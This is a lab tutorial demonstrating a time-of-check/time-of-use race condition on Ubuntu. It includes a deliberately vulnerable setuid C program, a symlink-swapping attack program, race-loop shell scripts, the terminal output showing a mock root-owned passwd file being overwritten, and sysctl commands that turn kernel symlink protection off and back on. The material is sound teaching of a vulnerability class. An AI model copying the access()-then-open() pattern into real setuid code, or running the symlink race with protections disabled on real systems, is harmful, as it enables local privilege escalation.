lazenca0x0@ubuntu:~/Exploit/RaceCondition$ mkdir etc lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cd etc lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ echo Only Root! > passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cat passwd Only Root! lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chown root:root passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chmod 644 passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ ls -al passwd -rw-r--r-- 1 root root 13 Jun 26 00:46 passwd lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cd .. lazenca0x0@ubuntu:~/Exploit/RaceCondition$ echo > file |
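#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

/*
 * vuln.c -- deliberately vulnerable demo program (installed setuid root).
 *
 * It checks write permission on ./file with access() and, only if that
 * passes, open()s the same path and writes a marker string into it.
 *
 * access() evaluates the *real* uid, so an unprivileged caller cannot pass
 * the check on a root-owned 0644 file; open() evaluates the *effective*
 * uid, which is root here.  Between the two calls the path is resolved
 * twice, independently: that gap is the time-of-check/time-of-use window
 * this lesson is about.  The robust fix is to not use access() at all --
 * drop privileges before open(), or open() first and validate the
 * descriptor with fstat() -- but the window is kept so the demo still
 * demonstrates it.
 *
 * Returns: EXIT_SUCCESS, or EXIT_FAILURE if open() fails after the check.
 */
int main(void) {
    int fd;
    char *file = "./file";
    char buffer[] = "Success!! Race Condition : lazenca.0x0\n";

    /* Check: permission is tested against the path as it is right now. */
    if (!access(file, W_OK)) {
        printf("Able to open file %s.\n", file);
        /* Use: the path is resolved again; it may no longer be the same object. */
        fd = open(file, O_WRONLY);
        if (fd == -1) {
            perror("open");
            return EXIT_FAILURE;
        }
        /* Write the text only; the original wrote sizeof(buffer), which
         * also put the trailing NUL terminator into the file. */
        if (write(fd, buffer, sizeof(buffer) - 1) == -1) {
            perror("write");
        }
        close(fd);
    } else {
        /* The failure path is intentionally silent (the original left the
         * message commented out) so run.sh's output stays readable. */
        //printf("Unable to open file %s.\n",file);
    }
    return EXIT_SUCCESS;
}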
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * attack.c -- the racing process started repeatedly by race.sh.
 *
 * Removes ./file and recreates it as a symbolic link to ./etc/passwd.
 * If this lands between vuln's access() check (which passed on the plain
 * file) and its open(), the setuid program follows the link and writes
 * into the root-owned target.
 *
 * Return values of unlink() and symlink() are not checked; an error
 * (e.g. ./file missing) is simply ignored.
 */
void main() {
    unlink("file");
    symlink("./etc/passwd","file");
}
#!/bin/bash
# run.sh -- run the setuid demo binary ./vuln over and over, forever, so
# that its check/use window keeps reopening.  Stop with Ctrl-C.
while true; do
  ./vuln
done
#!/bin/bash
# race.sh -- keep launching ./attack until the target file's `ls -l`
# listing changes, i.e. until the setuid program has written through the
# symlink into ./etc/passwd.
#
# $CHECK_FILE is expanded unquoted on purpose: word-splitting turns the
# string into the command name and its arguments.
CHECK_FILE="ls -l ./etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
# NOTE(review): the listing only changes when size, mode, owner or mtime
# change; in this demo the size change is what trips the comparison.
while [ "$old" == "$new" ]
do
  ./attack
  new=$($CHECK_FILE)
done
echo "Success! The passwd file has been changed"
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o vuln vuln.c lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chown root:root vuln lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chmod 4755 ./vuln lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o attack attack.c |
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo sysctl -w fs.protected_symlinks=0 lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./run.sh Able to open file ./file. Able to open file ./file. Able to open file ./file. ... |
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./race.sh Success! The passwd file has been changed lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cat ./etc/passwd Success!! Race Condition : lazenca.0x0 lazenca0x0@ubuntu:~/Exploit/RaceCondition$ |
Disable the kernel's symlink-following restriction for the duration of the demo:
Ubuntu 12.04
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
Ubuntu 16.04
$ sudo sysctl -w fs.protected_symlinks=0
Re-enable the restriction once the demo is done (1 is the value Ubuntu ships by default):
Ubuntu 12.04
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1
Ubuntu 16.04
$ sudo sysctl -w fs.protected_symlinks=1